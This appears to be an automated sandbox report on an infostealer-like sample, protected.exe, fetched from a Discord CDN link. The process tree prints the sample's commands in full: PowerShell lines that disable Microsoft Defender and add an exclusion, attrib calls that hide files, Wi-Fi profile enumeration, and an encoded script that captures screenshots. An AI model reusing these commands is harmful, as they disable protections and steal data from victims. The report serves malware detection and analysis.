Token: SeShutdownPrivilege	5296	wmic.exe
Token: SeDebugPrivilege	5296	wmic.exe
Token: SeSystemEnvironmentPrivilege	5296	wmic.exe
Token: SeRemoteShutdownPrivilege	5296	wmic.exe
Token: SeUndockPrivilege	5296	wmic.exe
Token: SeManageVolumePrivilege	5296	wmic.exe
Token: 33	5296	wmic.exe
Token: 34	5296	wmic.exe
Token: 35	5296	wmic.exe
Token: 36	5296	wmic.exe
Token: SeIncreaseQuotaPrivilege	5296	wmic.exe
Token: SeSecurityPrivilege	5296	wmic.exe
Token: SeTakeOwnershipPrivilege	5296	wmic.exe
Token: SeLoadDriverPrivilege	5296	wmic.exe
Token: SeSystemProfilePrivilege	5296	wmic.exe
Token: SeSystemtimePrivilege	5296	wmic.exe
Token: SeProfSingleProcessPrivilege	5296	wmic.exe
Token: SeIncBasePriorityPrivilege	5296	wmic.exe
Token: SeCreatePagefilePrivilege	5296	wmic.exe
Token: SeBackupPrivilege	5296	wmic.exe
Token: SeRestorePrivilege	5296	wmic.exe
Token: SeShutdownPrivilege	5296	wmic.exe
Token: SeDebugPrivilege	5296	wmic.exe
Token: SeSystemEnvironmentPrivilege	5296	wmic.exe
Token: SeRemoteShutdownPrivilege	5296	wmic.exe
Token: SeUndockPrivilege	5296	wmic.exe
Token: SeManageVolumePrivilege	5296	wmic.exe
Token: 33	5296	wmic.exe
Token: 34	5296	wmic.exe
Token: 35	5296	wmic.exe
Token: 36	5296	wmic.exe
Token: SeIncreaseQuotaPrivilege	5332	wmic.exe
Token: SeSecurityPrivilege	5332	wmic.exe
Token: SeTakeOwnershipPrivilege	5332	wmic.exe
Token: SeLoadDriverPrivilege	5332	wmic.exe
Token: SeSystemProfilePrivilege	5332	wmic.exe
Token: SeSystemtimePrivilege	5332	wmic.exe
Token: SeProfSingleProcessPrivilege	5332	wmic.exe
Token: SeIncBasePriorityPrivilege	5332	wmic.exe
Token: SeCreatePagefilePrivilege	5332	wmic.exe
Token: SeBackupPrivilege	5332	wmic.exe
Token: SeRestorePrivilege	5332	wmic.exe
Token: SeShutdownPrivilege	5332	wmic.exe
Token: SeDebugPrivilege	5332	wmic.exe
Token: SeSystemEnvironmentPrivilege	5332	wmic.exe
Token: SeRemoteShutdownPrivilege	5332	wmic.exe
Token: SeUndockPrivilege	5332	wmic.exe
Token: SeManageVolumePrivilege	5332	wmic.exe
Token: 33	5332	wmic.exe
Token: 34	5332	wmic.exe
Token: 35	5332	wmic.exe
Token: 36	5332	wmic.exe

Suspicious use of FindShellTrayWindow 38 IoCs

pid	Process
4436	msedge.exe
4436	msedge.exe
4436	msedge.exe
4436	msedge.exe
4436	msedge.exe
4436	msedge.exe
4436	msedge.exe
4436	msedge.exe
4436	msedge.exe
4436	msedge.exe
4436	msedge.exe
4436	msedge.exe
4436	msedge.exe
4436	msedge.exe
4436	msedge.exe
4436	msedge.exe
4436	msedge.exe
4436	msedge.exe
4436	msedge.exe
4436	msedge.exe
4436	msedge.exe
4436	msedge.exe
4436	msedge.exe
4436	msedge.exe
4436	msedge.exe
4436	msedge.exe
4436	msedge.exe
4436	msedge.exe
4436	msedge.exe
4436	msedge.exe
4436	msedge.exe
4436	msedge.exe
4436	msedge.exe
4436	msedge.exe
4436	msedge.exe
4436	msedge.exe
4436	msedge.exe
4436	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
4436	msedge.exe
4436	msedge.exe
4436	msedge.exe
4436	msedge.exe
4436	msedge.exe
4436	msedge.exe
4436	msedge.exe
4436	msedge.exe
4436	msedge.exe
4436	msedge.exe
4436	msedge.exe
4436	msedge.exe
4436	msedge.exe
4436	msedge.exe
4436	msedge.exe
4436	msedge.exe
4436	msedge.exe
4436	msedge.exe
4436	msedge.exe
4436	msedge.exe
4436	msedge.exe
4436	msedge.exe
4436	msedge.exe
4436	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4436 wrote to memory of 1920	4436	msedge.exe	83
PID 4436 wrote to memory of 1920	4436	msedge.exe	83
PID 4436 wrote to memory of 3976	4436	msedge.exe	84
PID 4436 wrote to memory of 3976	4436	msedge.exe	84
PID 4436 wrote to memory of 3976	4436	msedge.exe	84
PID 4436 wrote to memory of 3976	4436	msedge.exe	84
PID 4436 wrote to memory of 3976	4436	msedge.exe	84
PID 4436 wrote to memory of 3976	4436	msedge.exe	84
PID 4436 wrote to memory of 3976	4436	msedge.exe	84
PID 4436 wrote to memory of 3976	4436	msedge.exe	84
PID 4436 wrote to memory of 3976	4436	msedge.exe	84
PID 4436 wrote to memory of 3976	4436	msedge.exe	84
PID 4436 wrote to memory of 3976	4436	msedge.exe	84
PID 4436 wrote to memory of 3976	4436	msedge.exe	84
PID 4436 wrote to memory of 3976	4436	msedge.exe	84
PID 4436 wrote to memory of 3976	4436	msedge.exe	84
PID 4436 wrote to memory of 3976	4436	msedge.exe	84
PID 4436 wrote to memory of 3976	4436	msedge.exe	84
PID 4436 wrote to memory of 3976	4436	msedge.exe	84
PID 4436 wrote to memory of 3976	4436	msedge.exe	84
PID 4436 wrote to memory of 3976	4436	msedge.exe	84
PID 4436 wrote to memory of 3976	4436	msedge.exe	84
PID 4436 wrote to memory of 3976	4436	msedge.exe	84
PID 4436 wrote to memory of 3976	4436	msedge.exe	84
PID 4436 wrote to memory of 3976	4436	msedge.exe	84
PID 4436 wrote to memory of 3976	4436	msedge.exe	84
PID 4436 wrote to memory of 3976	4436	msedge.exe	84
PID 4436 wrote to memory of 3976	4436	msedge.exe	84
PID 4436 wrote to memory of 3976	4436	msedge.exe	84
PID 4436 wrote to memory of 3976	4436	msedge.exe	84
PID 4436 wrote to memory of 3976	4436	msedge.exe	84
PID 4436 wrote to memory of 3976	4436	msedge.exe	84
PID 4436 wrote to memory of 3976	4436	msedge.exe	84
PID 4436 wrote to memory of 3976	4436	msedge.exe	84
PID 4436 wrote to memory of 3976	4436	msedge.exe	84
PID 4436 wrote to memory of 3976	4436	msedge.exe	84
PID 4436 wrote to memory of 3976	4436	msedge.exe	84
PID 4436 wrote to memory of 3976	4436	msedge.exe	84
PID 4436 wrote to memory of 3976	4436	msedge.exe	84
PID 4436 wrote to memory of 3976	4436	msedge.exe	84
PID 4436 wrote to memory of 3976	4436	msedge.exe	84
PID 4436 wrote to memory of 3976	4436	msedge.exe	84
PID 4436 wrote to memory of 4440	4436	msedge.exe	85
PID 4436 wrote to memory of 4440	4436	msedge.exe	85
PID 4436 wrote to memory of 4220	4436	msedge.exe	86
PID 4436 wrote to memory of 4220	4436	msedge.exe	86
PID 4436 wrote to memory of 4220	4436	msedge.exe	86
PID 4436 wrote to memory of 4220	4436	msedge.exe	86
PID 4436 wrote to memory of 4220	4436	msedge.exe	86
PID 4436 wrote to memory of 4220	4436	msedge.exe	86
PID 4436 wrote to memory of 4220	4436	msedge.exe	86
PID 4436 wrote to memory of 4220	4436	msedge.exe	86
PID 4436 wrote to memory of 4220	4436	msedge.exe	86
PID 4436 wrote to memory of 4220	4436	msedge.exe	86
PID 4436 wrote to memory of 4220	4436	msedge.exe	86
PID 4436 wrote to memory of 4220	4436	msedge.exe	86
PID 4436 wrote to memory of 4220	4436	msedge.exe	86
PID 4436 wrote to memory of 4220	4436	msedge.exe	86
PID 4436 wrote to memory of 4220	4436	msedge.exe	86
PID 4436 wrote to memory of 4220	4436	msedge.exe	86
PID 4436 wrote to memory of 4220	4436	msedge.exe	86
PID 4436 wrote to memory of 4220	4436	msedge.exe	86
PID 4436 wrote to memory of 4220	4436	msedge.exe	86
PID 4436 wrote to memory of 4220	4436	msedge.exe	86

Views/modifies file attributes 1 TTPs 4 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
5244	attrib.exe
5272	attrib.exe
5848	attrib.exe
5888	attrib.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://cdn.discordapp.com/attachments/1279538248812728444/1279554286606356606/protected.exe?ex=66de17ca&is=66dcc64a&hm=43250b2cd503619bdfc07222d9499ec7477897d59a519ea19ce0c71f0ab6bf0a&
1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4436
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff88fe46f8,0x7fff88fe4708,0x7fff88fe4718
  2⤵
  PID:1920
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2072,17090313193720683728,16795083636627259372,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2076 /prefetch:2
  2⤵
  PID:3976
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2072,17090313193720683728,16795083636627259372,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2280 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4440
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2072,17090313193720683728,16795083636627259372,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2532 /prefetch:8
  2⤵
  PID:4220
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,17090313193720683728,16795083636627259372,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1
  2⤵
  PID:2496
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,17090313193720683728,16795083636627259372,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:1
  2⤵
  PID:1836
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2072,17090313193720683728,16795083636627259372,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5384 /prefetch:8
  2⤵
  PID:4152
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2072,17090313193720683728,16795083636627259372,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5384 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1272
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,17090313193720683728,16795083636627259372,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5444 /prefetch:1
  2⤵
  PID:3132
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,17090313193720683728,16795083636627259372,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5464 /prefetch:1
  2⤵
  PID:1572
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2072,17090313193720683728,16795083636627259372,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5032 /prefetch:8
  2⤵
  PID:2652
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,17090313193720683728,16795083636627259372,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1
  2⤵
  PID:4424
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2072,17090313193720683728,16795083636627259372,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6156 /prefetch:8
  2⤵
  PID:5108
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,17090313193720683728,16795083636627259372,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4140 /prefetch:1
  2⤵
  PID:3944
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,17090313193720683728,16795083636627259372,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6372 /prefetch:1
  2⤵
  PID:3100
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2072,17090313193720683728,16795083636627259372,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5464 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3368
- C:\Users\Admin\Downloads\_protected.exe
  "C:\Users\Admin\Downloads\_protected.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Drops file in Drivers directory
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Adds Run key to start application
  - Checks whether UAC is enabled
  - Maps connected drives based on registry
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Modifies system certificate store
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1568
- - C:\Windows\system32\attrib.exe
    attrib +h +s C:\Users\Admin\Downloads\_protected.exe
    3⤵
    - Views/modifies file attributes
    PID:5244
- - C:\Windows\system32\attrib.exe
    attrib +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
    3⤵
    - Views/modifies file attributes
    PID:5272
- - C:\Windows\System32\Wbem\wmic.exe
    wmic csproduct get UUID
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5296
- - C:\Windows\System32\Wbem\wmic.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    - Suspicious use of AdjustPrivilegeToken
    PID:5332
- - C:\Windows\System32\Wbem\wmic.exe
    wmic os get Caption
    3⤵
    PID:5388
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command Add-MpPreference -ExclusionPath C:\Users\Admin\Downloads\_protected.exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:5444
- - C:\Windows\System32\Wbem\wmic.exe
    wmic cpu get Name
    3⤵
    PID:5556
- - C:\Windows\System32\Wbem\wmic.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:5612
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:5668
- - C:\Windows\System32\Wbem\wmic.exe
    wmic csproduct get UUID
    3⤵
    PID:5780
- - C:\Windows\system32\attrib.exe
    attrib -r C:\Windows\System32\drivers\etc\hosts
    3⤵
    - Drops file in Drivers directory
    - Views/modifies file attributes
    PID:5848
- - C:\Windows\system32\netsh.exe
    netsh wlan show profiles
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:5864
- - C:\Windows\system32\attrib.exe
    attrib +r C:\Windows\System32\drivers\etc\hosts
    3⤵
    - Drops file in Drivers directory
    - Views/modifies file attributes
    PID:5888
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
    3⤵
    PID:5928
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hirbzoa4\hirbzoa4.cmdline"
      4⤵
      PID:6104
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES658B.tmp" "c:\Users\Admin\AppData\Local\Temp\hirbzoa4\CSCAB7601C5E106462BA9A62828D1A2B80.TMP"
        5⤵
        
        PID:6140
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2072,17090313193720683728,16795083636627259372,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2284 /prefetch:2
  2⤵
  PID:5568

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4852

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1700

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
9b008261dda31857d68792b46af6dd6d

SHA1
e82dc88e2d1da2df7cb19d79a0346b9bb90d52b3

SHA256
9ac598d4f8170f7e475d84103aead9e3c23d5f2d292741a7f56a17bde8b6f7da

SHA512
78853091403a06beeec4998e2e3a4342111895ffd485f7f7cd367741a4883f7a25864cba00a6c86f27dc0c9ce9d04f08011ecc40c8ae9383d33274739ac39f10

Download Submit
